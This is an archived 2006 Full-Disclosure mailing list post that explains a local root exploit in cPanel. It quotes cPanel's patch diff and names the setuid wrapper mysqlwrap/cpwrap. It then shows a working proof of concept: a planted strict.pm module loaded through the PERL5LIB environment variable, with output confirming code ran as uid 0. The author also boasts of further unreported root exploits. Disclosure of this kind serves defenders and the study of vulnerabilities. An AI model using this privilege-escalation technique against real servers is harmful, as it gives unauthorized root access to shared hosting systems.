[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] cpanel exploit
From: "cp haquer" <cphaquer () gmail ! com>
Date: 2006-09-30 18:48:32
Message-ID: c30d76280609301148g40fc4c6ao31424551507d1e67 () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
It was pretty easy to figure out how the exploit worked once you saw their
first attempt at fixing it.
--- /usr/local/cpanel/bin/mysqladmin 2006-08-29 16:54:07.000000000 -0500
+++ httpupdate.cpanel.net/cpanelsync/EDGE/bin/mysqladmin 2006-09-23
23:51:20.000000000 -0500
@@ -5,9 +5,14 @@
# This code is subject to the cpanel license. Unauthorized copying is
prohibited
BEGIN {
- push( @INC, "/usr/local/cpanel" );
+ unshift( @INC, "/usr/local/cpanel" );
+ @INC=grep(!/^\./,@INC);
+
@INC=grep(/^(\/usr\/lib\/perl|\/usr\/local\/lib\/perl|\/usr\/local\/cpanel)/,@INC);
+
}
So obviously the exploit involves inserting things into @INC when this
script is ran as root. So, how is this script ran as root?
lrwxrwxrwx 1 root root /usr/local/cpanel/bin/mysqlwrap -> cpwrap*
-rwsr-xr-x 1 root wheel /usr/local/cpanel/bin/cpwrap*
Through the setuid program mysqlwrap of course! So the only quesiton is how
to insert things into @INC. There are 2 ways that I could find, a command
line argument to perl, or the PERL5LIB environment variable. Obviously, the
PERL5LIB environment variable seems like a good bet.
domainc@domain.com [~]# cat ~/OMGWTFLOL/strict.pm
die("my id is $<\n");
domainc@domain.com [~]# PERL5LIB=/home/domainc/OMGWTFLOL
/usr/local/cpanel/bin/mysqlwrap ADDDB
<b>Database Created</b><br>
Added the database .
my id is 0
Compilation failed in require at /usr/local/cpanel/Cpanel/Version.pm line 8.
BEGIN failed--compilation aborted at /usr/local/cpanel/Cpanel/Version.pm
line 8.Compilation failed in require at /usr/local/cpanel/bin/mysqladmin
line 11.
BEGIN failed--compilation aborted at /usr/local/cpanel/bin/mysqladmin line
11.
Smart readers will realize that the above patch is pretty stupid attempt at
stopping the exploit. Several hosting companies with hacked servers had to
intervene to make sure cPanel fixed it correctly. In new verisons of
cPanel, cpwrap now appears to clean out environment variables before
executing things. But don't worry, there are several local root exploits
all over cPanel waiting to be discovered. I have discovered 2 more on the
same day that I discovered how this one works.
[Attachment #5 (text/html)]
It was pretty easy to figure out how the exploit worked once you saw their first attempt at \
fixing it.<br><br>--- /usr/local/cpanel/bin/mysqladmin 2006-08-29 \
16:54:07.000000000 -0500<br>+++ <a \
href="http://httpupdate.cpanel.net/cpanelsync/EDGE/bin/mysqladmin"> \
httpupdate.cpanel.net/cpanelsync/EDGE/bin/mysqladmin</a> \
2006-09-23 23:51:20.000000000 -0500<br>@@ -5,9 +5,14 @@<br> # This code is subject to the \
cpanel license. Unauthorized copying is prohibited<br><br> BEGIN {<br>
- push( @INC, "/usr/local/cpanel" );<br>+ \
unshift( @INC, "/usr/local/cpanel" );<br>+ \
@INC=grep(!/^\./,@INC);<br>+ \
@INC=grep(/^(\/usr\/lib\/perl|\/usr\/local\/lib\/perl|\/usr\/local\/cpanel)/,@INC); \
<br>+<br> }<br><br>So obviously the exploit involves inserting things into @INC when this \
script is ran as root. So, how is this script ran as \
root?<br><br>lrwxrwxrwx 1 root root \
/usr/local/cpanel/bin/mysqlwrap -> cpwrap* <br>-rwsr-xr-x 1 \
root wheel /usr/local/cpanel/bin/cpwrap*<br><br>Through the setuid \
program mysqlwrap of course! So the only quesiton is how to insert things into \
@INC. There are 2 ways that I could find, a command line argument to perl, or the \
PERL5LIB environment variable. Obviously, the PERL5LIB environment variable seems like a \
good bet. <br><br><br><a href="mailto:domainc@domain.com">domainc@domain.com</a> [~]# cat \
~/OMGWTFLOL/strict.pm<br>die("my id is $<\n");<br><a \
href="mailto:domainc@domain.com">domainc@domain.com</a> [~]# PERL5LIB=/home/domainc/OMGWTFLOL \
/usr/local/cpanel/bin/mysqlwrap ADDDB <br><b>Database \
Created</b><br><br>Added the database .<br>my id is 0<br>Compilation failed in \
require at /usr/local/cpanel/Cpanel/Version.pm line 8.<br>BEGIN failed--compilation aborted at \
/usr/local/cpanel/Cpanel/Version.pm line 8.Compilation failed in require at \
/usr/local/cpanel/bin/mysqladmin line 11.<br>BEGIN failed--compilation aborted at \
/usr/local/cpanel/bin/mysqladmin line 11.<br><br><br><br>Smart readers will realize that the \
above patch is pretty stupid attempt at stopping the exploit. Several hosting companies \
with hacked servers had to intervene to make sure cPanel fixed it correctly. In new \
verisons of cPanel, cpwrap now appears to clean out environment variables before executing \
things. But don't worry, there are several local root exploits all over cPanel waiting to \
be discovered. I have discovered 2 more on the same day that I discovered how this one \
works. <br>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic